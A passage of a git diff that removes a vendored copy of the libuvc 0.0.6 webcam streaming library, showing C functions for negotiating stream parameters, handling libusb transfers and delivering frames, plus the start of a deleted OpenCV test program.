-        uvc_query_stream_ctrl( devh, ctrl, 1, UVC_GET_MAX);
-
-        if (frame->intervals) {
-          for (interval = frame->intervals; *interval; ++interval) {
-            // allow a fps rate of zero to mean "accept first rate available"
-            if (10000000 / *interval == (unsigned int) fps || fps == 0) {
-
-              ctrl->bmHint = (1 << 0); /* don't negotiate interval */
-              ctrl->bFormatIndex = format->bFormatIndex;
-              ctrl->bFrameIndex = frame->bFrameIndex;
-              ctrl->dwFrameInterval = *interval;
-
-              goto found;
-            }
-          }
-        } else {
-          uint32_t interval_100ns = 10000000 / fps;
-          uint32_t interval_offset = interval_100ns - frame->dwMinFrameInterval;
-
-          if (interval_100ns >= frame->dwMinFrameInterval
-              && interval_100ns <= frame->dwMaxFrameInterval
-              && !(interval_offset
-                   && (interval_offset % frame->dwFrameIntervalStep))) {
-
-            ctrl->bmHint = (1 << 0);
-            ctrl->bFormatIndex = format->bFormatIndex;
-            ctrl->bFrameIndex = frame->bFrameIndex;
-            ctrl->dwFrameInterval = interval_100ns;
-
-            goto found;
-          }
-        }
-      }
-    }
-  }
-
-  return UVC_ERROR_INVALID_MODE;
-
-found:
-  return uvc_probe_stream_ctrl(devh, ctrl);
-}
-
-/** @internal
- * Negotiate streaming parameters with the device
- *
- * @param[in] devh UVC device
- * @param[in,out] ctrl Control block
- */
-uvc_error_t uvc_probe_stream_ctrl(
-    uvc_device_handle_t *devh,
-    uvc_stream_ctrl_t *ctrl) {
- 
-  uvc_query_stream_ctrl(
-      devh, ctrl, 1, UVC_SET_CUR
-  );
-
-  uvc_query_stream_ctrl(
-      devh, ctrl, 1, UVC_GET_CUR
-  );
-
-  /** @todo make sure that worked */
-  return UVC_SUCCESS;
-}
-
-/** @internal
- * @brief Swap the working buffer with the presented buffer and notify consumers
- */
-void _uvc_swap_buffers(uvc_stream_handle_t *strmh) {
-  uint8_t *tmp_buf;
-
-  pthread_mutex_lock(&strmh->cb_mutex);
-
-  /* swap the buffers */
-  tmp_buf = strmh->holdbuf;
-  strmh->hold_bytes = strmh->got_bytes;
-  strmh->holdbuf = strmh->outbuf;
-  strmh->outbuf = tmp_buf;
-  strmh->hold_last_scr = strmh->last_scr;
-  strmh->hold_pts = strmh->pts;
-  strmh->hold_seq = strmh->seq;
-
-  pthread_cond_broadcast(&strmh->cb_cond);
-  pthread_mutex_unlock(&strmh->cb_mutex);
-
-  strmh->seq++;
-  strmh->got_bytes = 0;
-  strmh->last_scr = 0;
-  strmh->pts = 0;
-}
-
-/** @internal
- * @brief Process a payload transfer
- * 
- * Processes stream, places frames into buffer, signals listeners
- * (such as user callback thread and any polling thread) on new frame
- *
- * @param payload Contents of the payload transfer, either a packet (isochronous) or a full
- * transfer (bulk mode)
- * @param payload_len Length of the payload transfer
- */
-void _uvc_process_payload(uvc_stream_handle_t *strmh, uint8_t *payload, size_t payload_len) {
-  size_t header_len;
-  uint8_t header_info;
-  size_t data_len;
-
-  /* magic numbers for identifying header packets from some iSight cameras */
-  static uint8_t isight_tag[] = {
-    0x11, 0x22, 0x33, 0x44,
-    0xde, 0xad, 0xbe, 0xef, 0xde, 0xad, 0xfa, 0xce
-  };
-
-  /* ignore empty payload transfers */
-  if (payload_len == 0)
-    return;
-
-  /* Certain iSight cameras have strange behavior: They send header
-   * information in a packet with no image data, and then the following
-   * packets have only image data, with no more headers until the next frame.
-   *
-   * The iSight header: len(1), flags(1 or 2), 0x11223344(4),
-   * 0xdeadbeefdeadface(8), ??(16)
-   */
-
-  if (strmh->devh->is_isight &&
-      (payload_len < 14 || memcmp(isight_tag, payload + 2, sizeof(isight_tag))) &&
-      (payload_len < 15 || memcmp(isight_tag, payload + 3, sizeof(isight_tag)))) {
-    /* The payload transfer doesn't have any iSight magic, so it's all image data */
-    header_len = 0;
-    data_len = payload_len;
-  } else {
-    header_len = payload[0];
-
-    if (header_len > payload_len) {
-      UVC_DEBUG("bogus packet: actual_len=%zd, header_len=%zd\n", payload_len, header_len);
-      return;
-    }
-
-    if (strmh->devh->is_isight)
-      data_len = 0;
-    else
-      data_len = payload_len - header_len;
-  }
-
-  if (header_len < 2) {
-    header_info = 0;
-  } else {
-    /** @todo we should be checking the end-of-header bit */
-    size_t variable_offset = 2;
-
-    header_info = payload[1];
-
-    if (header_info & 0x40) {
-      UVC_DEBUG("bad packet: error bit set");
-      return;
-    }
-
-    if (strmh->fid != (header_info & 1) && strmh->got_bytes != 0) {
-      /* The frame ID bit was flipped, but we have image data sitting
-         around from prior transfers. This means the camera didn't send
-         an EOF for the last transfer of the previous frame. */
-      _uvc_swap_buffers(strmh);
-    }
-
-    strmh->fid = header_info & 1;
-
-    if (header_info & (1 << 2)) {
-      strmh->pts = DW_TO_INT(payload + variable_offset);
-      variable_offset += 4;
-    }
-
-    if (header_info & (1 << 3)) {
-      /** @todo read the SOF token counter */
-      strmh->last_scr = DW_TO_INT(payload + variable_offset);
-      variable_offset += 6;
-    }
-  }
-
-  if (data_len > 0) {
-    memcpy(strmh->outbuf + strmh->got_bytes, payload + header_len, data_len);
-    strmh->got_bytes += data_len;
-
-    if (header_info & (1 << 1)) {
-      /* The EOF bit is set, so publish the complete frame */
-      _uvc_swap_buffers(strmh);
-    }
-  }
-}
-
-/** @internal
- * @brief Stream transfer callback
- *
- * Processes stream, places frames into buffer, signals listeners
- * (such as user callback thread and any polling thread) on new frame
- *
- * @param transfer Active transfer
- */
-void LIBUSB_CALL _uvc_stream_callback(struct libusb_transfer *transfer) {
-  uvc_stream_handle_t *strmh = transfer->user_data;
-
-  int resubmit = 1;
-
-  switch (transfer->status) {
-  case LIBUSB_TRANSFER_COMPLETED:
-    if (transfer->num_iso_packets == 0) {
-      /* This is a bulk mode transfer, so it just has one payload transfer */
-      _uvc_process_payload(strmh, transfer->buffer, transfer->actual_length);
-    } else {
-      /* This is an isochronous mode transfer, so each packet has a payload transfer */
-      int packet_id;
-
-      for (packet_id = 0; packet_id < transfer->num_iso_packets; ++packet_id) {
-        uint8_t *pktbuf;
-        struct libusb_iso_packet_descriptor *pkt;
-
-        pkt = transfer->iso_packet_desc + packet_id;
-
-        if (pkt->status != 0) {
-          UVC_DEBUG("bad packet (isochronous transfer); status: %d", pkt->status);
-          continue;
-        }
-
-        pktbuf = libusb_get_iso_packet_buffer_simple(transfer, packet_id);
-
-        _uvc_process_payload(strmh, pktbuf, pkt->actual_length);
-
-      }
-    }
-    break;
-  case LIBUSB_TRANSFER_CANCELLED: 
-  case LIBUSB_TRANSFER_ERROR:
-  case LIBUSB_TRANSFER_NO_DEVICE: {
-    int i;
-    UVC_DEBUG("not retrying transfer, status = %d", transfer->status);
-    pthread_mutex_lock(&strmh->cb_mutex);
-
-    /* Mark transfer as deleted. */
-    for(i=0; i < LIBUVC_NUM_TRANSFER_BUFS; i++) {
-      if(strmh->transfers[i] == transfer) {
-        UVC_DEBUG("Freeing transfer %d (%p)", i, transfer);
-        free(transfer->buffer);
-        libusb_free_transfer(transfer);
-        strmh->transfers[i] = NULL;
-        break;
-      }
-    }
-    if(i == LIBUVC_NUM_TRANSFER_BUFS ) {
-      UVC_DEBUG("transfer %p not found; not freeing!", transfer);
-    }
-
-    resubmit = 0;
-
-    pthread_cond_broadcast(&strmh->cb_cond);
-    pthread_mutex_unlock(&strmh->cb_mutex);
-
-    break;
-  }
-  case LIBUSB_TRANSFER_TIMED_OUT:
-  case LIBUSB_TRANSFER_STALL:
-  case LIBUSB_TRANSFER_OVERFLOW:
-    UVC_DEBUG("retrying transfer, status = %d", transfer->status);
-    break;
-  }
-  
-  if ( resubmit ) {
-    if ( strmh->running ) {
-      libusb_submit_transfer(transfer);
-    } else {
-      int i;
-      pthread_mutex_lock(&strmh->cb_mutex);
-
-      /* Mark transfer as deleted. */
-      for(i=0; i < LIBUVC_NUM_TRANSFER_BUFS; i++) {
-        if(strmh->transfers[i] == transfer) {
-          UVC_DEBUG("Freeing orphan transfer %d (%p)", i, transfer);
-          free(transfer->buffer);
-          libusb_free_transfer(transfer);
-          strmh->transfers[i] = NULL;
-        }
-      }
-      if(i == LIBUVC_NUM_TRANSFER_BUFS ) {
-        UVC_DEBUG("orphan transfer %p not found; not freeing!", transfer);
-      }
-
-      pthread_cond_broadcast(&strmh->cb_cond);
-      pthread_mutex_unlock(&strmh->cb_mutex);
-    }
-  }
-}
-
-/** Begin streaming video from the camera into the callback function.
- * @ingroup streaming
- *
- * @param devh UVC device
- * @param ctrl Control block, processed using {uvc_probe_stream_ctrl} or
- *             {uvc_get_stream_ctrl_format_size}
- * @param cb   User callback function. See {uvc_frame_callback_t} for restrictions.
- * @param flags Stream setup flags, currently undefined. Set this to zero. The lower bit
- * is reserved for backward compatibility.
- */
-uvc_error_t uvc_start_streaming(
-    uvc_device_handle_t *devh,
-    uvc_stream_ctrl_t *ctrl,
-    uvc_frame_callback_t *cb,
-    void *user_ptr,
-    uint8_t flags
-) {
-  uvc_error_t ret;
-  uvc_stream_handle_t *strmh;
-
-  ret = uvc_stream_open_ctrl(devh, &strmh, ctrl);
-  if (ret != UVC_SUCCESS)
-    return ret;
-
-  ret = uvc_stream_start(strmh, cb, user_ptr, flags);
-  if (ret != UVC_SUCCESS) {
-    uvc_stream_close(strmh);
-    return ret;
-  }
-
-  return UVC_SUCCESS;
-}
-
-/** Begin streaming video from the camera into the callback function.
- * @ingroup streaming
- *
- * @deprecated The stream type (bulk vs. isochronous) will be determined by the
- * type of interface associated with the uvc_stream_ctrl_t parameter, regardless
- * of whether the caller requests isochronous streaming. Please switch to
- * uvc_start_streaming().
- *
- * @param devh UVC device
- * @param ctrl Control block, processed using {uvc_probe_stream_ctrl} or
- *             {uvc_get_stream_ctrl_format_size}
- * @param cb   User callback function. See {uvc_frame_callback_t} for restrictions.
- */
-uvc_error_t uvc_start_iso_streaming(
-    uvc_device_handle_t *devh,
-    uvc_stream_ctrl_t *ctrl,
-    uvc_frame_callback_t *cb,
-    void *user_ptr
-) {
-  return uvc_start_streaming(devh, ctrl, cb, user_ptr, 0);
-}
-
-static uvc_stream_handle_t *_uvc_get_stream_by_interface(uvc_device_handle_t *devh, int interface_idx) {
-  uvc_stream_handle_t *strmh;
-
-  DL_FOREACH(devh->streams, strmh) {
-    if (strmh->stream_if->bInterfaceNumber == interface_idx)
-      return strmh;
-  }
-
-  return NULL;
-}
-
-static uvc_streaming_interface_t *_uvc_get_stream_if(uvc_device_handle_t *devh, int interface_idx) {
-  uvc_streaming_interface_t *stream_if;
-
-  DL_FOREACH(devh->info->stream_ifs, stream_if) {
-    if (stream_if->bInterfaceNumber == interface_idx)
-      return stream_if;
-  }
-  
-  return NULL;
-}
-
-/** Open a new video stream.
- * @ingroup streaming
- *
- * @param devh UVC device
- * @param ctrl Control block, processed using {uvc_probe_stream_ctrl} or
- *             {uvc_get_stream_ctrl_format_size}
- */
-uvc_error_t uvc_stream_open_ctrl(uvc_device_handle_t *devh, uvc_stream_handle_t **strmhp, uvc_stream_ctrl_t *ctrl) {
-  /* Chosen frame and format descriptors */
-  uvc_stream_handle_t *strmh = NULL;
-  uvc_streaming_interface_t *stream_if;
-  uvc_error_t ret;
-
-  UVC_ENTER();
-
-  if (_uvc_get_stream_by_interface(devh, ctrl->bInterfaceNumber) != NULL) {
-    ret = UVC_ERROR_BUSY; /* Stream is already opened */
-    goto fail;
-  }
-
-  stream_if = _uvc_get_stream_if(devh, ctrl->bInterfaceNumber);
-  if (!stream_if) {
-    ret = UVC_ERROR_INVALID_PARAM;
-    goto fail;
-  }
-
-  strmh = calloc(1, sizeof(*strmh));
-  if (!strmh) {
-    ret = UVC_ERROR_NO_MEM;
-    goto fail;
-  }
-  strmh->devh = devh;
-  strmh->stream_if = stream_if;
-  strmh->frame.library_owns_data = 1;
-
-  ret = uvc_claim_if(strmh->devh, strmh->stream_if->bInterfaceNumber);
-  if (ret != UVC_SUCCESS)
-    goto fail;
-
-  ret = uvc_stream_ctrl(strmh, ctrl);
-  if (ret != UVC_SUCCESS)
-    goto fail;
-
-  // Set up the streaming status and data space
-  strmh->running = 0;
-  /** @todo take only what we need */
-  strmh->outbuf = malloc( LIBUVC_XFER_BUF_SIZE );
-  strmh->holdbuf = malloc( LIBUVC_XFER_BUF_SIZE );
-   
-  pthread_mutex_init(&strmh->cb_mutex, NULL);
-  pthread_cond_init(&strmh->cb_cond, NULL);
-
-  DL_APPEND(devh->streams, strmh);
-
-  *strmhp = strmh;
-
-  UVC_EXIT(0);
-  return UVC_SUCCESS;
-
-fail:
-  if(strmh)
-    free(strmh);
-  UVC_EXIT(ret);
-  return ret;
-}
-
-/** Begin streaming video from the stream into the callback function.
- * @ingroup streaming
- *
- * @param strmh UVC stream
- * @param cb   User callback function. See {uvc_frame_callback_t} for restrictions.
- * @param flags Stream setup flags, currently undefined. Set this to zero. The lower bit
- * is reserved for backward compatibility.
- */
-uvc_error_t uvc_stream_start(
-    uvc_stream_handle_t *strmh,
-    uvc_frame_callback_t *cb,
-    void *user_ptr,
-    uint8_t flags
-) {
-  /* USB interface we'll be using */
-  const struct libusb_interface *interface;
-  int interface_id;
-  char isochronous;
-  uvc_frame_desc_t *frame_desc;
-  uvc_format_desc_t *format_desc;
-  uvc_stream_ctrl_t *ctrl;
-  uvc_error_t ret;
-  /* Total amount of data per transfer */
-  size_t total_transfer_size = 0;
-  struct libusb_transfer *transfer;
-  int transfer_id;
-
-  ctrl = &strmh->cur_ctrl;
-
-  UVC_ENTER();
-
-  if (strmh->running) {
-    UVC_EXIT(UVC_ERROR_BUSY);
-    return UVC_ERROR_BUSY;
-  }
-
-  strmh->running = 1;
-  strmh->seq = 1;
-  strmh->fid = 0;
-  strmh->pts = 0;
-  strmh->last_scr = 0;
-
-  frame_desc = uvc_find_frame_desc_stream(strmh, ctrl->bFormatIndex, ctrl->bFrameIndex);
-  if (!frame_desc) {
-    ret = UVC_ERROR_INVALID_PARAM;
-    goto fail;
-  }
-  format_desc = frame_desc->parent;
-
-  strmh->frame_format = uvc_frame_format_for_guid(format_desc->guidFormat);
-  if (strmh->frame_format == UVC_FRAME_FORMAT_UNKNOWN) {
-    ret = UVC_ERROR_NOT_SUPPORTED;
-    goto fail;
-  }
-
-  // Get the interface that provides the chosen format and frame configuration
-  interface_id = strmh->stream_if->bInterfaceNumber;
-  interface = &strmh->devh->info->config->interface[interface_id];
-
-  /* A VS interface uses isochronous transfers iff it has multiple altsettings.
-   * (UVC 1.5: 2.4.3. VideoStreaming Interface) */
-  isochronous = interface->num_altsetting > 1;
-
-  if (isochronous) {
-    /* For isochronous streaming, we choose an appropriate altsetting for the endpoint
-     * and set up several transfers */
-    const struct libusb_interface_descriptor *altsetting = 0;
-    const struct libusb_endpoint_descriptor *endpoint;
-    /* The greatest number of bytes that the device might provide, per packet, in this
-     * configuration */
-    size_t config_bytes_per_packet;
-    /* Number of packets per transfer */
-    size_t packets_per_transfer = 0;
-    /* Size of packet transferable from the chosen endpoint */
-    size_t endpoint_bytes_per_packet = 0;
-    /* Index of the altsetting */
-    int alt_idx, ep_idx;
-    
-    config_bytes_per_packet = strmh->cur_ctrl.dwMaxPayloadTransferSize;
-
-    /* Go through the altsettings and find one whose packets are at least
-     * as big as our format's maximum per-packet usage. Assume that the
-     * packet sizes are increasing. */
-    for (alt_idx = 0; alt_idx < interface->num_altsetting; alt_idx++) {
-      altsetting = interface->altsetting + alt_idx;
-      endpoint_bytes_per_packet = 0;
-
-      /* Find the endpoint with the number specified in the VS header */
-      for (ep_idx = 0; ep_idx < altsetting->bNumEndpoints; ep_idx++) {
-        endpoint = altsetting->endpoint + ep_idx;
-
-        if (endpoint->bEndpointAddress == format_desc->parent->bEndpointAddress) {
-          endpoint_bytes_per_packet = endpoint->wMaxPacketSize;
-          // wMaxPacketSize: [unused:2 (multiplier-1):3 size:11]
-          endpoint_bytes_per_packet = (endpoint_bytes_per_packet & 0x07ff) *
-                                      (((endpoint_bytes_per_packet >> 11) & 3) + 1);
-          break;
-        }
-      }
-
-      if (endpoint_bytes_per_packet >= config_bytes_per_packet) {
-        /* Transfers will be at most one frame long: Divide the maximum frame size
-         * by the size of the endpoint and round up */
-        packets_per_transfer = (ctrl->dwMaxVideoFrameSize +
-                                endpoint_bytes_per_packet - 1) / endpoint_bytes_per_packet;
-
-        /* But keep a reasonable limit: Otherwise we start dropping data */
-        if (packets_per_transfer > 32)
-          packets_per_transfer = 32;
-        
-        total_transfer_size = packets_per_transfer * endpoint_bytes_per_packet;
-        break;
-      }
-    }
-
-    /* If we searched through all the altsettings and found nothing usable */
-    if (alt_idx == interface->num_altsetting) {
-      ret = UVC_ERROR_INVALID_MODE;
-      goto fail;
-    }
-
-    /* Select the altsetting */
-    ret = libusb_set_interface_alt_setting(strmh->devh->usb_devh,
-                                           altsetting->bInterfaceNumber,
-                                           altsetting->bAlternateSetting);
-    if (ret != UVC_SUCCESS) {
-      UVC_DEBUG("libusb_set_interface_alt_setting failed");
-      goto fail;
-    }
-
-    /* Set up the transfers */
-    for (transfer_id = 0; transfer_id < LIBUVC_NUM_TRANSFER_BUFS; ++transfer_id) {
-      transfer = libusb_alloc_transfer(packets_per_transfer);
-      strmh->transfers[transfer_id] = transfer;      
-      strmh->transfer_bufs[transfer_id] = malloc(total_transfer_size);
-
-      libusb_fill_iso_transfer(
-        transfer, strmh->devh->usb_devh, format_desc->parent->bEndpointAddress,
-        strmh->transfer_bufs[transfer_id],
-        total_transfer_size, packets_per_transfer, _uvc_stream_callback, (void*) strmh, 5000);
-
-      libusb_set_iso_packet_lengths(transfer, endpoint_bytes_per_packet);
-    }
-  } else {
-    for (transfer_id = 0; transfer_id < LIBUVC_NUM_TRANSFER_BUFS;
-        ++transfer_id) {
-      transfer = libusb_alloc_transfer(0);
-      strmh->transfers[transfer_id] = transfer;
-      strmh->transfer_bufs[transfer_id] = malloc (
-          strmh->cur_ctrl.dwMaxPayloadTransferSize );
-      libusb_fill_bulk_transfer ( transfer, strmh->devh->usb_devh,
-          format_desc->parent->bEndpointAddress,
-          strmh->transfer_bufs[transfer_id],
-          strmh->cur_ctrl.dwMaxPayloadTransferSize, _uvc_stream_callback,
-          ( void* ) strmh, 5000 );
-    }
-  }
-
-  strmh->user_cb = cb;
-  strmh->user_ptr = user_ptr;
-
-  /* If the user wants it, set up a thread that calls the user's function
-   * with the contents of each frame.
-   */
-  if (cb) {
-    pthread_create(&strmh->cb_thread, NULL, _uvc_user_caller, (void*) strmh);
-  }
-
-  for (transfer_id = 0; transfer_id < LIBUVC_NUM_TRANSFER_BUFS;
-      transfer_id++) {
-    ret = libusb_submit_transfer(strmh->transfers[transfer_id]);
-    if (ret != UVC_SUCCESS) {
-      UVC_DEBUG("libusb_submit_transfer failed: %d",ret);
-      break;
-    }
-  }
-
-  if ( ret != UVC_SUCCESS && transfer_id > 0 ) {
-    for ( ; transfer_id < LIBUVC_NUM_TRANSFER_BUFS; transfer_id++) {
-      free ( strmh->transfers[transfer_id]->buffer );
-      libusb_free_transfer ( strmh->transfers[transfer_id]);
-      strmh->transfers[transfer_id] = 0;
-    }
-    ret = UVC_SUCCESS;
-  }
-
-  UVC_EXIT(ret);
-  return ret;
-fail:
-  strmh->running = 0;
-  UVC_EXIT(ret);
-  return ret;
-}
-
-/** Begin streaming video from the stream into the callback function.
- * @ingroup streaming
- *
- * @deprecated The stream type (bulk vs. isochronous) will be determined by the
- * type of interface associated with the uvc_stream_ctrl_t parameter, regardless
- * of whether the caller requests isochronous streaming. Please switch to
- * uvc_stream_start().
- *
- * @param strmh UVC stream
- * @param cb   User callback function. See {uvc_frame_callback_t} for restrictions.
- */
-uvc_error_t uvc_stream_start_iso(
-    uvc_stream_handle_t *strmh,
-    uvc_frame_callback_t *cb,
-    void *user_ptr
-) {
-  return uvc_stream_start(strmh, cb, user_ptr, 0);
-}
-
-/** @internal
- * @brief User callback runner thread
- * @note There should be at most one of these per currently streaming device
- * @param arg Device handle
- */
-void *_uvc_user_caller(void *arg) {
-  uvc_stream_handle_t *strmh = (uvc_stream_handle_t *) arg;
-
-  uint32_t last_seq = 0;
-
-  do {
-    pthread_mutex_lock(&strmh->cb_mutex);
-
-    while (strmh->running && last_seq == strmh->hold_seq) {
-      pthread_cond_wait(&strmh->cb_cond, &strmh->cb_mutex);
-    }
-
-    if (!strmh->running) {
-      pthread_mutex_unlock(&strmh->cb_mutex);
-      break;
-    }
-    
-    last_seq = strmh->hold_seq;
-    _uvc_populate_frame(strmh);
-    
-    pthread_mutex_unlock(&strmh->cb_mutex);
-    
-    strmh->user_cb(&strmh->frame, strmh->user_ptr);
-  } while(1);
-
-  return NULL; // return value ignored
-}
-
-/** @internal
- * @brief Populate the fields of a frame to be handed to user code
- * must be called with stream cb lock held!
- */
-void _uvc_populate_frame(uvc_stream_handle_t *strmh) {
-  uvc_frame_t *frame = &strmh->frame;
-  uvc_frame_desc_t *frame_desc;
-
-  /** @todo this stuff that hits the main config cache should really happen
-   * in start() so that only one thread hits these data. all of this stuff
-   * is going to be reopen_on_change anyway
-   */
-
-  frame_desc = uvc_find_frame_desc(strmh->devh, strmh->cur_ctrl.bFormatIndex,
-				   strmh->cur_ctrl.bFrameIndex);
-
-  frame->frame_format = strmh->frame_format;
-  
-  frame->width = frame_desc->wWidth;
-  frame->height = frame_desc->wHeight;
-  
-  switch (frame->frame_format) {
-  case UVC_FRAME_FORMAT_YUYV:
-    frame->step = frame->width * 2;
-    break;
-  case UVC_FRAME_FORMAT_MJPEG:
-    frame->step = 0;
-    break;
-  default:
-    frame->step = 0;
-    break;
-  }
-
-  frame->sequence = strmh->hold_seq;
-  /** @todo set the frame time */
-  // frame->capture_time
-
-  /* copy the image data from the hold buffer to the frame (unnecessary extra buf?) */
-  if (frame->data_bytes < strmh->hold_bytes) {
-    frame->data = realloc(frame->data, strmh->hold_bytes);
-  }
-  frame->data_bytes = strmh->hold_bytes;
-  memcpy(frame->data, strmh->holdbuf, frame->data_bytes);
-
-
-
-}
-
-/** Poll for a frame
- * @ingroup streaming
- *
- * @param devh UVC device
- * @param[out] frame Location to store pointer to captured frame (NULL on error)
- * @param timeout_us >0: Wait at most N microseconds; 0: Wait indefinitely; -1: return immediately
- */
-uvc_error_t uvc_stream_get_frame(uvc_stream_handle_t *strmh,
-			  uvc_frame_t **frame,
-			  int32_t timeout_us) {
-  time_t add_secs;
-  time_t add_nsecs;
-  struct timespec ts;
-  struct timeval tv;
-
-  if (!strmh->running)
-    return UVC_ERROR_INVALID_PARAM;
-
-  if (strmh->user_cb)
-    return UVC_ERROR_CALLBACK_EXISTS;
-
-  pthread_mutex_lock(&strmh->cb_mutex);
-
-  if (strmh->last_polled_seq < strmh->hold_seq) {
-    _uvc_populate_frame(strmh);
-    *frame = &strmh->frame;
-    strmh->last_polled_seq = strmh->hold_seq;
-  } else if (timeout_us != -1) {
-    if (timeout_us == 0) {
-      pthread_cond_wait(&strmh->cb_cond, &strmh->cb_mutex);
-    } else {
-      add_secs = timeout_us / 1000000;
-      add_nsecs = (timeout_us % 1000000) * 1000;
-      ts.tv_sec = 0;
-      ts.tv_nsec = 0;
-
-#if _POSIX_TIMERS > 0
-      clock_gettime(CLOCK_REALTIME, &ts);
-#else
-      gettimeofday(&tv, NULL);
-      ts.tv_sec = tv.tv_sec;
-      ts.tv_nsec = tv.tv_usec * 1000;
-#endif
-
-      ts.tv_sec += add_secs;
-      ts.tv_nsec += add_nsecs;
-
-      /* pthread_cond_timedwait FAILS with EINVAL if ts.tv_nsec > 1000000000 (1 billion)
-       * Since we are just adding values to the timespec, we have to increment the seconds if nanoseconds is greater than 1 billion,
-       * and then re-adjust the nanoseconds in the correct range.
-       * */
-      ts.tv_sec += ts.tv_nsec / 1000000000;
-      ts.tv_nsec = ts.tv_nsec % 1000000000;
-
-      int err = pthread_cond_timedwait(&strmh->cb_cond, &strmh->cb_mutex, &ts);
-
-      //TODO: How should we handle EINVAL?
-      switch(err){
-      case EINVAL:
-          *frame = NULL;
-          return UVC_ERROR_OTHER;
-      case ETIMEDOUT:
-          *frame = NULL;
-          return UVC_ERROR_TIMEOUT;
-      }
-    }
-    
-    if (strmh->last_polled_seq < strmh->hold_seq) {
-      _uvc_populate_frame(strmh);
-      *frame = &strmh->frame;
-      strmh->last_polled_seq = strmh->hold_seq;
-    } else {
-      *frame = NULL;
-    }
-  } else {
-    *frame = NULL;
-  }
-
-  pthread_mutex_unlock(&strmh->cb_mutex);
-
-  return UVC_SUCCESS;
-}
-
-/** @brief Stop streaming video
- * @ingroup streaming
- *
- * Closes all streams, ends threads and cancels pollers
- *
- * @param devh UVC device
- */
-void uvc_stop_streaming(uvc_device_handle_t *devh) {
-  uvc_stream_handle_t *strmh, *strmh_tmp;
-
-  DL_FOREACH_SAFE(devh->streams, strmh, strmh_tmp) {
-    uvc_stream_close(strmh);
-  }
-}
-
-/** @brief Stop stream.
- * @ingroup streaming
- *
- * Stops stream, ends threads and cancels pollers
- *
- * @param devh UVC device
- */
-uvc_error_t uvc_stream_stop(uvc_stream_handle_t *strmh) {
-  int i;
-
-  if (!strmh->running)
-    return UVC_ERROR_INVALID_PARAM;
-
-  strmh->running = 0;
-
-  pthread_mutex_lock(&strmh->cb_mutex);
-
-  for(i=0; i < LIBUVC_NUM_TRANSFER_BUFS; i++) {
-    if(strmh->transfers[i] != NULL) {
-      int res = libusb_cancel_transfer(strmh->transfers[i]);
-      if(res < 0 && res != LIBUSB_ERROR_NOT_FOUND ) {
-        free(strmh->transfers[i]->buffer);
-        libusb_free_transfer(strmh->transfers[i]);
-        strmh->transfers[i] = NULL;
-      }
-    }
-  }
-
-  /* Wait for transfers to complete/cancel */
-  do {
-    for(i=0; i < LIBUVC_NUM_TRANSFER_BUFS; i++) {
-      if(strmh->transfers[i] != NULL)
-        break;
-    }
-    if(i == LIBUVC_NUM_TRANSFER_BUFS )
-      break;
-    pthread_cond_wait(&strmh->cb_cond, &strmh->cb_mutex);
-  } while(1);
-  // Kick the user thread awake
-  pthread_cond_broadcast(&strmh->cb_cond);
-  pthread_mutex_unlock(&strmh->cb_mutex);
-
-  /** @todo stop the actual stream, camera side? */
-
-  if (strmh->user_cb) {
-    /* wait for the thread to stop (triggered by
-     * LIBUSB_TRANSFER_CANCELLED transfer) */
-    pthread_join(strmh->cb_thread, NULL);
-  }
-
-  return UVC_SUCCESS;
-}
-
-/** @brief Close stream.
- * @ingroup streaming
- *
- * Closes stream, frees handle and all streaming resources.
- *
- * @param strmh UVC stream handle
- */
-void uvc_stream_close(uvc_stream_handle_t *strmh) {
-  if (strmh->running)
-    uvc_stream_stop(strmh);
-
-  uvc_release_if(strmh->devh, strmh->stream_if->bInterfaceNumber);
-
-  if (strmh->frame.data)
-    free(strmh->frame.data);
-
-  free(strmh->outbuf);
-  free(strmh->holdbuf);
-
-  pthread_cond_destroy(&strmh->cb_cond);
-  pthread_mutex_destroy(&strmh->cb_mutex);
-
-  DL_DELETE(strmh->devh->streams, strmh);
-  free(strmh);
-}
diff --git a/thirdparty/libuvc-0.0.6/src/test.c b/thirdparty/libuvc-0.0.6/src/test.c
deleted file mode 100644
index e48cfc9..0000000
--- a/thirdparty/libuvc-0.0.6/src/test.c
+++ /dev/null
@@ -1,153 +0,0 @@
-/*********************************************************************
-* Software License Agreement (BSD License)
-*
-*  Copyright (C) 2010-2012 Ken Tossell
-*  All rights reserved.
-*
-*  Redistribution and use in source and binary forms, with or without
-*  modification, are permitted provided that the following conditions
-*  are met:
-*
-*   * Redistributions of source code must retain the above copyright
-*     notice, this list of conditions and the following disclaimer.
-*   * Redistributions in binary form must reproduce the above
-*     copyright notice, this list of conditions and the following
-*     disclaimer in the documentation and/or other materials provided
-*     with the distribution.
-*   * Neither the name of the author nor other contributors may be
-*     used to endorse or promote products derived from this software
-*     without specific prior written permission.
-*
-*  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-*  "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-*  LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
-*  FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
-*  COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
-*  INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
-*  BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-*  LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-*  CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
-*  LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
-*  ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-*  POSSIBILITY OF SUCH DAMAGE.
-*********************************************************************/
-#include <stdio.h>
-#include <opencv/highgui.h>
-
-#include "libuvc/libuvc.h"
-
-void cb(uvc_frame_t *frame, void *ptr) {
-  uvc_frame_t *bgr;
-  uvc_error_t ret;
-  IplImage* cvImg;
-
-  printf("callback! length = %u, ptr = %d\n", frame->data_bytes, (int) ptr);
-
-  bgr = uvc_allocate_frame(frame->width * frame->height * 3);
-  if (!bgr) {
-    printf("unable to allocate bgr frame!");
-    return;
-  }
-
-  ret = uvc_any2bgr(frame, bgr);
-  if (ret) {
-    uvc_perror(ret, "uvc_any2bgr");
-    uvc_free_frame(bgr);
-    return;
-  }
-
-  cvImg = cvCreateImageHeader(
-      cvSize(bgr->width, bgr->height),
-      IPL_DEPTH_8U,
-      3);
-
-  cvSetData(cvImg, bgr->data, bgr->width * 3); 
-
